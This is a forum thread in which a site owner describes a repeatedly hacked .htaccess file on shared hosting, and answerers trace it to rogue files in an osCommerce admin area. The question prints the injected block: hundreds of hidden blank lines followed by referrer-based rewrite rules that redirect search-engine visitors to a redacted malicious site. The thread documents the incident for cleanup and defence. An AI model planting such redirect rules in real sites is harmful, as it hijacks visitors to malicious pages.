.htaccess being hacked repeatedly [duplicate]

hacking .htaccess

About 4 or 5 days ago, a client came back to me saying that their site was being redirected to some other suspicious looking website from Google, Yahoo, etc., but it was working fine when the user enters the site URL in the browser address bar directly.

I tried contacting my hosting provider, but they were little to no help at first and then seemed to take forever to find out the problem.

Frustrated by the wait, I set out to find what had happened. After a little bit of trawling on Google for solutions, I found out that my .htaccess file had been hacked.

What was:

<Files *>
Header set Cache-Control: "private, pre-check=0, post-check=0, max-age=0"
Header set Expires: 0
Header set Pragma: no-cache
</Files>

had become

<Files *>
Header set Cache-Control: "private, pre-check=0, post-check=0, max-age=0"
Header set Expires: 0
Header set Pragma: no-cache
</Files>
//several hundred empty lines later
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ /*don't want to post the malicious URL here for fear of retaliation */[R=301,L]

Basically, the bot that hacked me seemed to write directions that all traffic coming from the important sites be redirected to the virus site.

I immediately fixed it by removing the offensive code, and felt very nice about my clever self. I also removed the .htaccess file from the main folder that is accessed by the public, and kept it one folder above, at the root. I also changed the permissions to 444, read only by anyone. I changed the passwords to my FTP access, my hosting control panel, MySQL databases, et al.

However, today the issue was back. Turns out that a NEW .htaccess file had been installed in my public_html folder, and this had only the offensive code I wrote above and nothing else.

What's going on?

I have a feeling that this is not a case of my passwords being compromised. I'm on shared hosting, and maybe someone on the same hard-disk wrote a piece of code that went about writing .htaccess files merrily to all its neighbors. Is this possible? And is there anything I can do make sure this does not happen again?

There is no way I can reinstall or do anything to the main OS of the host though...


Solution 1:

Your site has been hacked. You need to wipe it and restore from a known good backup. Keep a copy of the hacked site and it's logs so that you can compare it to the good site and try to figure out how the site was compromised.

Solution 2:

I found the roaches!

I did everything, including changing FTP password, hosting panel password, (painfully) wiping the whole 2GB and going through uploading it all back up, and changing database password.

They still got in.

The FTP logs showed nothing but my own actions. On top of that, the .htaccess file's last-modified-timestamp is exactly the same as my timestamp (whenever I corrected it from its repeated perversion) so there was no way to know when and how modifications took place. I guessed they were using filemtime() and touch() to do that.

It turns out the rogue files are getting in through an osCommerce installation. I do not how, but specifically, its getting through the administration area. In the admin folders, there's these foreign files called "google_analitis(sic)_somenumber". I noticed them on my main stats reader. I just looked at all the files that were being accessed (the normal logs) today, and by luck, the file got hacked again just today. I suspected there was a rogue script and lo-and-behold, these files have the spammer-stink written all over their filenames.

I opened them up and sure enough, they were up to a lot of mischief.

I just opened one of the files using the URL, and I was really surprised the amount of control these files were providing... it was a parallel control panel to the entire website!

Hope this helps someone... look at your third party apps, especially when you see a large number of unknown bots crawling up and down your site.

Related

Worker Group VS Node Group EKS
How to configure Kubernetes with multiply NIC / VLAN on vSphere?
Is there a risk for HDD being loosely packaged for transportation?
What's the difference between "archaic" and "obsolete" in dictionaries?
One word meaning "good wish" or "well wishing thought"?
Comparative and Superlative for little? [closed]
meaning of ''bearing gifts'' in context [closed]
How to form a gerund from “practise”? [closed]
What is subject of the second sentence joined by "and"? [duplicate]
Definition of a proxy in this context
Is it appropriate to speak of a "pre-study intern"?
Can participial phrases describe the actions of a subject other than the first one mentioned?